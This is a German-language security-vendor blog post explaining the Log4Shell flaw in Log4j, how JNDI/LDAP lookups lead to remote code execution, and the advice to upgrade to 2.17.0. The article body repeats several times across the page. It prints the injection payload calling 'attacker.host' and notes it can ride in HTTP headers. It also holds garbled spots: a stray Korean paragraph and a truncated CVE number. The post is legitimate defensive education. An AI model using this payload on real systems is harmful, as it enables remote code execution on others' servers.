SCW-Symbole
Held-Hintergrund ohne Trennlinie
Blog

Beschreibung der Log4j-Sicherheitslücke – Angriffsvektoren und Präventionsmaßnahmen

Laura Verheyde
Veröffentlicht Jan 16, 2022
Zuletzt aktualisiert am 09. März 2026

Am 9. Dezember wurde ein Zero-Day-Exploit für die Java-Bibliothek Log4j veröffentlicht. CVE-44228, auch bekannt als Log4j Shell, wurde aufgrund der Möglichkeit der Ausführung von Remote-Code als „hochkritisch“ eingestuft (Race). Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.

Möchten Sie Ihre Kenntnisse im Umgang mit Log4Shell schnell verbessern?

Ausgehend von den Grundkonzepten von Log4Shell haben wir ein Showcase erstellt, in dem Sie die Ausnutzung dieser Schwachstelle in einem Simulator namens Mission erleben können. In dieser Mission zeigen wir Ihnen, welche Auswirkungen die Log4j-Schwachstelle auf Ihre Infrastruktur und Anwendungen haben kann. Klicken Sie hier, um direkt zum Showcase zu gelangen, oderlesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.

Alte Nachrichten?

Exploits sind nichts Neues. Sicherheitsforscher haben bereits 2016 in einer Black Hat-Präsentation von Alvaro Munoz und Oleksandr Mirosh betont: „Anwendungen sollten keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen.“Sie erklärten, wie eine gezielte JNDI/LDAP-Injektion zu einer Remote-Code-Ausführung führen kann. Genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Injektions-Payload von Log4Shell lautet wie folgt.

$ {indi:ldap: //attacker.host/xyz}

이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.

Als Nächstes gibt es JNDI oder eine API, die es ermöglicht, Daten oder Ressourcen zu suchen, indem sie sich über Protokolle wie Java Naming and Directory Interface, LDAP, DNS, RMI usw. mit Diensten verbindet. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine schädliche Nutzlast eine Suche auf einem LDAP-Server durch, der vom Angreifer kontrolliert wird. Die Antwort kann beispielsweise auf eine Java-Klassendatei verweisen, die schädlichen Code enthält, die dann auf einem anfälligen Server ausgeführt wird.

Der Grund, warum diese Schwachstelle so problematisch ist, liegt darin, dass Log4j alle Protokolleinträge auswertet und alle aufgezeichneten Benutzereingaben mit dem Präfix „jndi“ in EL-Syntax abfragt. Die Nutzlast kann an allen Stellen eingefügt werden, an denen Benutzer Daten eingeben können, beispielsweise in Formularfeldern.Außerdem können HTTP-Header (z. B. User-Agent und X-Forwarded-For sowie andere Header) so angepasst werden, dass sie die Nutzlast übertragen.

Um Exploits selbst zu erleben , gehen Sie zum Showcase und fahren Sie mit Schritt 2 – „Erleben Sie die Wirkung“ fort.

Prävention: Bewusstsein

Da Log4j den anfälligen Code patcht, wird ein Upgrade für alle Anwendungen empfohlen. Allerdings enthalten die Versionen 2.15.0 und 2.16.0 DDoS- und andere Schwachstellen, sodass ein Upgrade auf 2.17.0 ab Ende Dezember empfohlen wird.

Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Verwendung externer Quellen, die wir naiv für sicher halten, die Sicherheit unserer Anwendungen gefährden kann.

Hätte diese Schwachstelle verhindert werden können? Ja und nein. Einerseits können Entwickler nur dann viel tun, wenn die anfällige Komponente über Software von Drittanbietern eingeführt wird. Andererseits ist die daraus gewonnene Erkenntnis nichts Neues: Man sollte niemals den Eingaben der Benutzer vertrauen.

Secure Code Warrior ist davon überzeugt, dass dies der beste Weg für sicherheitsbewusste Entwickler ist, um Schwachstellen im Code zu vermeiden. Da SCW Schulungen für verschiedene Programmierframeworks in großem Umfang anbietet, konnten Unternehmenskunden anhand der Berichtsdaten schnell ermitteln, welche Java-Entwickler betroffen waren. Außerdem wurde die Log4j-Aktualisierung mit Hilfe von SCW-geschulten Sicherheitsexperten beschleunigt.

Insbesondere für Java-Entwickler bietet Secure Code Warrior das kostenlose IntelliJ-Plugin Sensei an. Dieses regelbasierte Code-Analyse-Tool kann zur Anwendung von Codierungsrichtlinien und zur Vorbeugung und Behebung von Schwachstellen verwendet werden. Sie können eigene Regeln erstellen oder vorgefertigte Regeln verwenden. Kochbuch. Schauen Sie sich unsere Rezepte an und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, das Ihnen dabei hilft, die Log4Shell-Schwachstelle im Handumdrehen zu finden und zu beheben.

Verbessern Sie Ihre Verteidigungstechniken gegen Log4Shell.

Möchten Sie das in diesem Blogbeitrag Gelernte in der Praxis anwenden? Dann könnte Ihnen die Showcase-Umgebung helfen. Wenn Sie die Showcase-Umgebung starten, werden Sie zunächst schnell durch die Schwachstelle geführt und gelangen dann in eine Simulationsumgebung, in der Sie anhand der Anweisungen versuchen können, die Schwachstelle auszunutzen.


Ressourcen anzeigen
Ressourcen anzeigen

Im Dezember 2021 wurde eine schwerwiegende Sicherheitslücke namens Log4Shell in der Java-Bibliothek Log4j bekannt gegeben. In diesem Dokument wird die Log4Shell-Sicherheitslücke in ihrer einfachsten Form aufgeschlüsselt, um die Grundlagen zu vermitteln. Auf der Grundlage dieses Wissens wird eine Spielwiese vorgestellt, auf der simulierte Websites ausgenutzt werden können.

Sind Sie an weiteren Informationen interessiert?

mehr erfahren

Secure Code Warrior ist für Unternehmen da, um den Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Unabhängig davon, ob Sie AppSec-Manager, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind, können wir Ihnen dabei helfen, die Risiken zu reduzieren, die mit unsicherem Code verbunden sind.

Demo-Termin vereinbaren
Freigabeziel:
LinkedIn-MarkenSozialx Logo
Verfasser
Laura Verheyde
Veröffentlicht Jan 16, 2022

Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.

Freigabeziel:
LinkedIn-MarkenSozialx Logo

Am 9. Dezember wurde ein Zero-Day-Exploit für die Java-Bibliothek Log4j veröffentlicht. CVE-44228, auch bekannt als Log4j Shell, wurde aufgrund der Möglichkeit der Ausführung von Remote-Code als „hochkritisch“ eingestuft (Race). Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.

Möchten Sie Ihre Kenntnisse im Umgang mit Log4Shell schnell verbessern?

Ausgehend von den Grundkonzepten von Log4Shell haben wir ein Showcase erstellt, in dem Sie die Ausnutzung dieser Schwachstelle in einem Simulator namens Mission erleben können. In dieser Mission zeigen wir Ihnen, welche Auswirkungen die Log4j-Schwachstelle auf Ihre Infrastruktur und Anwendungen haben kann. Klicken Sie hier, um direkt zum Showcase zu gelangen, oderlesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.

Alte Nachrichten?

Exploits sind nichts Neues. Sicherheitsforscher haben bereits 2016 in einer Black Hat-Präsentation von Alvaro Munoz und Oleksandr Mirosh betont: „Anwendungen sollten keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen.“Sie erklärten, wie eine gezielte JNDI/LDAP-Injektion zu einer Remote-Code-Ausführung führen kann. Genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Injektions-Payload von Log4Shell lautet wie folgt.

$ {indi:ldap: //attacker.host/xyz}

이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.

Als Nächstes gibt es JNDI oder eine API, die es ermöglicht, Daten oder Ressourcen zu suchen, indem sie sich über Protokolle wie Java Naming and Directory Interface, LDAP, DNS, RMI usw. mit Diensten verbindet. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine schädliche Nutzlast eine Suche auf einem LDAP-Server durch, der vom Angreifer kontrolliert wird. Die Antwort kann beispielsweise auf eine Java-Klassendatei verweisen, die schädlichen Code enthält, die dann auf einem anfälligen Server ausgeführt wird.

Der Grund, warum diese Schwachstelle so problematisch ist, liegt darin, dass Log4j alle Protokolleinträge auswertet und alle aufgezeichneten Benutzereingaben mit dem Präfix „jndi“ in EL-Syntax abfragt. Die Nutzlast kann an allen Stellen eingefügt werden, an denen Benutzer Daten eingeben können, beispielsweise in Formularfeldern.Außerdem können HTTP-Header (z. B. User-Agent und X-Forwarded-For sowie andere Header) so angepasst werden, dass sie die Nutzlast übertragen.

Um Exploits selbst zu erleben , gehen Sie zum Showcase und fahren Sie mit Schritt 2 – „Erleben Sie die Wirkung“ fort.

Prävention: Bewusstsein

Da Log4j den anfälligen Code patcht, wird ein Upgrade für alle Anwendungen empfohlen. Allerdings enthalten die Versionen 2.15.0 und 2.16.0 DDoS- und andere Schwachstellen, sodass ein Upgrade auf 2.17.0 ab Ende Dezember empfohlen wird.

Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Verwendung externer Quellen, die wir naiv für sicher halten, die Sicherheit unserer Anwendungen gefährden kann.

Hätte diese Schwachstelle verhindert werden können? Ja und nein. Einerseits können Entwickler nur dann viel tun, wenn die anfällige Komponente über Software von Drittanbietern eingeführt wird. Andererseits ist die daraus gewonnene Erkenntnis nichts Neues: Man sollte niemals den Eingaben der Benutzer vertrauen.

Secure Code Warrior ist davon überzeugt, dass dies der beste Weg für sicherheitsbewusste Entwickler ist, um Schwachstellen im Code zu vermeiden. Da SCW Schulungen für verschiedene Programmierframeworks in großem Umfang anbietet, konnten Unternehmenskunden anhand der Berichtsdaten schnell ermitteln, welche Java-Entwickler betroffen waren. Außerdem wurde die Log4j-Aktualisierung mit Hilfe von SCW-geschulten Sicherheitsexperten beschleunigt.

Insbesondere für Java-Entwickler bietet Secure Code Warrior das kostenlose IntelliJ-Plugin Sensei an. Dieses regelbasierte Code-Analyse-Tool kann zur Anwendung von Codierungsrichtlinien und zur Vorbeugung und Behebung von Schwachstellen verwendet werden. Sie können eigene Regeln erstellen oder vorgefertigte Regeln verwenden. Kochbuch. Schauen Sie sich unsere Rezepte an und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, das Ihnen dabei hilft, die Log4Shell-Schwachstelle im Handumdrehen zu finden und zu beheben.

Verbessern Sie Ihre Verteidigungstechniken gegen Log4Shell.

Möchten Sie das in diesem Blogbeitrag Gelernte in der Praxis anwenden? Dann könnte Ihnen die Showcase-Umgebung helfen. Wenn Sie die Showcase-Umgebung starten, werden Sie zunächst schnell durch die Schwachstelle geführt und gelangen dann in eine Simulationsumgebung, in der Sie anhand der Anweisungen versuchen können, die Schwachstelle auszunutzen.


Ressourcen anzeigen
Ressourcen anzeigen

Um den Bericht herunterzuladen, füllen Sie bitte das folgende Formular aus.

Wir bitten um Ihre Zustimmung, Ihnen Informationen zu unseren Produkten und/oder verwandten Themen der Sicherheitscodierung zukommen zu lassen. Wir behandeln Ihre personenbezogenen Daten stets mit größter Sorgfalt und verkaufen sie niemals zu Marketingzwecken an andere Unternehmen.

Einreichung
scw Erfolgssymbol
scw-Fehlersymbol
Um das Formular zu senden, aktivieren Sie bitte das „Analytics“-Cookie. Nach Abschluss können Sie es jederzeit wieder deaktivieren.

Am 9. Dezember wurde ein Zero-Day-Exploit für die Java-Bibliothek Log4j veröffentlicht. CVE-44228, auch bekannt als Log4j Shell, wurde aufgrund der Möglichkeit der Ausführung von Remote-Code als „hochkritisch“ eingestuft (Race). Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.

Möchten Sie Ihre Kenntnisse im Umgang mit Log4Shell schnell verbessern?

Ausgehend von den Grundkonzepten von Log4Shell haben wir ein Showcase erstellt, in dem Sie die Ausnutzung dieser Schwachstelle in einem Simulator namens Mission erleben können. In dieser Mission zeigen wir Ihnen, welche Auswirkungen die Log4j-Schwachstelle auf Ihre Infrastruktur und Anwendungen haben kann. Klicken Sie hier, um direkt zum Showcase zu gelangen, oderlesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.

Alte Nachrichten?

Exploits sind nichts Neues. Sicherheitsforscher haben bereits 2016 in einer Black Hat-Präsentation von Alvaro Munoz und Oleksandr Mirosh betont: „Anwendungen sollten keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen.“Sie erklärten, wie eine gezielte JNDI/LDAP-Injektion zu einer Remote-Code-Ausführung führen kann. Genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Injektions-Payload von Log4Shell lautet wie folgt.

$ {indi:ldap: //attacker.host/xyz}

이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.

Als Nächstes gibt es JNDI oder eine API, die es ermöglicht, Daten oder Ressourcen zu suchen, indem sie sich über Protokolle wie Java Naming and Directory Interface, LDAP, DNS, RMI usw. mit Diensten verbindet. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine schädliche Nutzlast eine Suche auf einem LDAP-Server durch, der vom Angreifer kontrolliert wird. Die Antwort kann beispielsweise auf eine Java-Klassendatei verweisen, die schädlichen Code enthält, die dann auf einem anfälligen Server ausgeführt wird.

Der Grund, warum diese Schwachstelle so problematisch ist, liegt darin, dass Log4j alle Protokolleinträge auswertet und alle aufgezeichneten Benutzereingaben mit dem Präfix „jndi“ in EL-Syntax abfragt. Die Nutzlast kann an allen Stellen eingefügt werden, an denen Benutzer Daten eingeben können, beispielsweise in Formularfeldern.Außerdem können HTTP-Header (z. B. User-Agent und X-Forwarded-For sowie andere Header) so angepasst werden, dass sie die Nutzlast übertragen.

Um Exploits selbst zu erleben , gehen Sie zum Showcase und fahren Sie mit Schritt 2 – „Erleben Sie die Wirkung“ fort.

Prävention: Bewusstsein

Da Log4j den anfälligen Code patcht, wird ein Upgrade für alle Anwendungen empfohlen. Allerdings enthalten die Versionen 2.15.0 und 2.16.0 DDoS- und andere Schwachstellen, sodass ein Upgrade auf 2.17.0 ab Ende Dezember empfohlen wird.

Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Verwendung externer Quellen, die wir naiv für sicher halten, die Sicherheit unserer Anwendungen gefährden kann.

Hätte diese Schwachstelle verhindert werden können? Ja und nein. Einerseits können Entwickler nur dann viel tun, wenn die anfällige Komponente über Software von Drittanbietern eingeführt wird. Andererseits ist die daraus gewonnene Erkenntnis nichts Neues: Man sollte niemals den Eingaben der Benutzer vertrauen.

Secure Code Warrior ist davon überzeugt, dass dies der beste Weg für sicherheitsbewusste Entwickler ist, um Schwachstellen im Code zu vermeiden. Da SCW Schulungen für verschiedene Programmierframeworks in großem Umfang anbietet, konnten Unternehmenskunden anhand der Berichtsdaten schnell ermitteln, welche Java-Entwickler betroffen waren. Außerdem wurde die Log4j-Aktualisierung mit Hilfe von SCW-geschulten Sicherheitsexperten beschleunigt.

Insbesondere für Java-Entwickler bietet Secure Code Warrior das kostenlose IntelliJ-Plugin Sensei an. Dieses regelbasierte Code-Analyse-Tool kann zur Anwendung von Codierungsrichtlinien und zur Vorbeugung und Behebung von Schwachstellen verwendet werden. Sie können eigene Regeln erstellen oder vorgefertigte Regeln verwenden. Kochbuch. Schauen Sie sich unsere Rezepte an und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, das Ihnen dabei hilft, die Log4Shell-Schwachstelle im Handumdrehen zu finden und zu beheben.

Verbessern Sie Ihre Verteidigungstechniken gegen Log4Shell.

Möchten Sie das in diesem Blogbeitrag Gelernte in der Praxis anwenden? Dann könnte Ihnen die Showcase-Umgebung helfen. Wenn Sie die Showcase-Umgebung starten, werden Sie zunächst schnell durch die Schwachstelle geführt und gelangen dann in eine Simulationsumgebung, in der Sie anhand der Anweisungen versuchen können, die Schwachstelle auszunutzen.


Webinar ansehen
Beginnen
mehr erfahren

Klicken Sie auf den folgenden Link und laden Sie die PDF-Datei dieser Ressource herunter.

Secure Code Warrior ist für Unternehmen da, um den Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Unabhängig davon, ob Sie AppSec-Manager, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind, können wir Ihnen dabei helfen, die Risiken zu reduzieren, die mit unsicherem Code verbunden sind.

Bericht anzeigenDemo-Termin vereinbaren
Ressourcen anzeigen
Freigabeziel:
LinkedIn-MarkenSozialx Logo
Sind Sie an weiteren Informationen interessiert?

Freigabeziel:
LinkedIn-MarkenSozialx Logo
Verfasser
Laura Verheyde
Veröffentlicht Jan 16, 2022

Laura Verheyde ist Softwareentwicklerin bei Secure Code Warrior und beschäftigt sich mit der Erforschung von Schwachstellen und der Erstellung von Inhalten für Missions und Coding Labs.

Freigabeziel:
LinkedIn-MarkenSozialx Logo

Am 9. Dezember wurde ein Zero-Day-Exploit für die Java-Bibliothek Log4j veröffentlicht. CVE-44228, auch bekannt als Log4j Shell, wurde aufgrund der Möglichkeit der Ausführung von Remote-Code als „hochkritisch“ eingestuft (Race). Da log4j-core eine der am häufigsten verwendeten Java-Logging-Bibliotheken ist, sind Millionen von Anwendungen gefährdet.

Möchten Sie Ihre Kenntnisse im Umgang mit Log4Shell schnell verbessern?

Ausgehend von den Grundkonzepten von Log4Shell haben wir ein Showcase erstellt, in dem Sie die Ausnutzung dieser Schwachstelle in einem Simulator namens Mission erleben können. In dieser Mission zeigen wir Ihnen, welche Auswirkungen die Log4j-Schwachstelle auf Ihre Infrastruktur und Anwendungen haben kann. Klicken Sie hier, um direkt zum Showcase zu gelangen, oderlesen Sie weiter, um mehr über diese Schwachstelle zu erfahren.

Alte Nachrichten?

Exploits sind nichts Neues. Sicherheitsforscher haben bereits 2016 in einer Black Hat-Präsentation von Alvaro Munoz und Oleksandr Mirosh betont: „Anwendungen sollten keine JNDI-Abfragen mit nicht vertrauenswürdigen Daten durchführen.“Sie erklärten, wie eine gezielte JNDI/LDAP-Injektion zu einer Remote-Code-Ausführung führen kann. Genau das ist der Kern von Log4Shell.

Angriffsvektor

Die Injektions-Payload von Log4Shell lautet wie folgt.

$ {indi:ldap: //attacker.host/xyz}

이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.

Als Nächstes gibt es JNDI oder eine API, die es ermöglicht, Daten oder Ressourcen zu suchen, indem sie sich über Protokolle wie Java Naming and Directory Interface, LDAP, DNS, RMI usw. mit Diensten verbindet. Einfach ausgedrückt führt JNDI in dem oben genannten Beispiel für eine schädliche Nutzlast eine Suche auf einem LDAP-Server durch, der vom Angreifer kontrolliert wird. Die Antwort kann beispielsweise auf eine Java-Klassendatei verweisen, die schädlichen Code enthält, die dann auf einem anfälligen Server ausgeführt wird.

Der Grund, warum diese Schwachstelle so problematisch ist, liegt darin, dass Log4j alle Protokolleinträge auswertet und alle aufgezeichneten Benutzereingaben mit dem Präfix „jndi“ in EL-Syntax abfragt. Die Nutzlast kann an allen Stellen eingefügt werden, an denen Benutzer Daten eingeben können, beispielsweise in Formularfeldern.Außerdem können HTTP-Header (z. B. User-Agent und X-Forwarded-For sowie andere Header) so angepasst werden, dass sie die Nutzlast übertragen.

Um Exploits selbst zu erleben , gehen Sie zum Showcase und fahren Sie mit Schritt 2 – „Erleben Sie die Wirkung“ fort.

Prävention: Bewusstsein

Da Log4j den anfälligen Code patcht, wird ein Upgrade für alle Anwendungen empfohlen. Allerdings enthalten die Versionen 2.15.0 und 2.16.0 DDoS- und andere Schwachstellen, sodass ein Upgrade auf 2.17.0 ab Ende Dezember empfohlen wird.

Als Entwickler, die Code schreiben, müssen wir stets die Sicherheit berücksichtigen. Log4Shell hat uns gezeigt, dass die Verwendung von Frameworks oder Bibliotheken von Drittanbietern Risiken mit sich bringt. Wir müssen uns bewusst sein, dass die Verwendung externer Quellen, die wir naiv für sicher halten, die Sicherheit unserer Anwendungen gefährden kann.

Hätte diese Schwachstelle verhindert werden können? Ja und nein. Einerseits können Entwickler nur dann viel tun, wenn die anfällige Komponente über Software von Drittanbietern eingeführt wird. Andererseits ist die daraus gewonnene Erkenntnis nichts Neues: Man sollte niemals den Eingaben der Benutzer vertrauen.

Secure Code Warrior ist davon überzeugt, dass dies der beste Weg für sicherheitsbewusste Entwickler ist, um Schwachstellen im Code zu vermeiden. Da SCW Schulungen für verschiedene Programmierframeworks in großem Umfang anbietet, konnten Unternehmenskunden anhand der Berichtsdaten schnell ermitteln, welche Java-Entwickler betroffen waren. Außerdem wurde die Log4j-Aktualisierung mit Hilfe von SCW-geschulten Sicherheitsexperten beschleunigt.

Insbesondere für Java-Entwickler bietet Secure Code Warrior das kostenlose IntelliJ-Plugin Sensei an. Dieses regelbasierte Code-Analyse-Tool kann zur Anwendung von Codierungsrichtlinien und zur Vorbeugung und Behebung von Schwachstellen verwendet werden. Sie können eigene Regeln erstellen oder vorgefertigte Regeln verwenden. Kochbuch. Schauen Sie sich unsere Rezepte an und vergessen Sie nicht, unser Log4j-Kochbuch herunterzuladen, das Ihnen dabei hilft, die Log4Shell-Schwachstelle im Handumdrehen zu finden und zu beheben.

Verbessern Sie Ihre Verteidigungstechniken gegen Log4Shell.

Möchten Sie das in diesem Blogbeitrag Gelernte in der Praxis anwenden? Dann könnte Ihnen die Showcase-Umgebung helfen. Wenn Sie die Showcase-Umgebung starten, werden Sie zunächst schnell durch die Schwachstelle geführt und gelangen dann in eine Simulationsumgebung, in der Sie anhand der Anweisungen versuchen können, die Schwachstelle auszunutzen.


Inhaltsverzeichnis

PDF herunterladen
Ressourcen anzeigen
Sind Sie an weiteren Informationen interessiert?

mehr erfahren

Secure Code Warrior ist für Unternehmen da, um den Code während des gesamten Softwareentwicklungszyklus zu schützen und eine Kultur zu schaffen, in der Cybersicherheit oberste Priorität hat. Unabhängig davon, ob Sie AppSec-Manager, Entwickler, CISO oder in einem anderen Bereich der Sicherheit tätig sind, können wir Ihnen dabei helfen, die Risiken zu reduzieren, die mit unsicherem Code verbunden sind.

Demo-Termin vereinbarenDownload
Freigabeziel:
LinkedIn-MarkenSozialx Logo
Ressourcen-Hub

Hilfreiche Ressourcen für den Einstieg

Weitere Beiträge
Ressourcen-Hub

Hilfreiche Ressourcen für den Einstieg

Weitere Beiträge